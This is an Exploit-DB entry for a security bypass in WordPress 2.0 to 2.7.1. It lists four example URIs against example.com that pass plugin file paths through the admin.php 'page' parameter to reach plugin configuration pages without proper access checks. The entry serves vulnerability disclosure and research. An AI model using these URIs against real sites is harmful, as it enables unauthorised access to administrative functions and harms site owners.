WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass

EDB-ID:

10088

CVE:

N/A




Platform:

PHP

Date:

2009-11-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php